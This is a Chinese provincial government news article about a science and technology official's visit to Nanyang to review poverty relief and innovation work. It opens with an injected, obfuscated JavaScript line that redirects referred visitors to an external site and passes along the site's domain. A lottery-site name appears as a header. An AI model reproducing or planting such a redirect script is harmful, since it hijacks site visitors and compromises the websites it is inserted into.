var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

省科技厅厅长马刚深入南阳市调研科技扶贫和科技创新工作


发布日期:2020-09-04 17:37来源:农村科技处(河南省农业科技园区管理办公室) 阅读次数:

  9月2日,省科技厅党组书记、厅长马刚一行深入南阳市考察调研科技扶贫和科技创新工作。南阳市副市长阿颖、南阳市科技局负责同志陪同调研。

  调研组首先来到牧原食品股份有限公司,深入了解企业科技扶贫、科技创新和智能化改造情况,马刚对企业依靠科技创新增强发展新动能、推动企业创新发展取得优异成绩给予充分肯定,就企业下一步科研平台建设、科技人才培养、科技奖励等提出发展建议。随后,调研组到河南中光学集团、卧龙防爆集团智能化生产车间现场考察,为企业创新发展给予指导。

  在下午召开的座谈会上,马刚听取了南阳市科技扶贫和科技创新工作汇报,与邓州、内乡负责同志及部分企业、科技特派员代表等进行座谈交流,马刚对南阳市近年来科技工作取得的成绩给予充分肯定,并强调今年是脱贫攻坚收官之年,要切实深入开展精准帮扶,抓住关键节点,找准发力点,形成合力,全覆盖服务好群众。要增强科技特派员力量,努力提升科技扶贫工作的实际成效,助力乡村振兴。要围绕企业的科技创新需求主动服务、精准对接,充分发挥科技创新政策导向作用,帮助企业解决一批科技创新中的困难和问题,开发出一批具有自主知识产权的高新技术和产品,为建设创新型河南、让中原更加出彩做出科技部门应有的贡献。

  期间,马刚厅长一行还赴社旗县考察指导科技扶贫工作。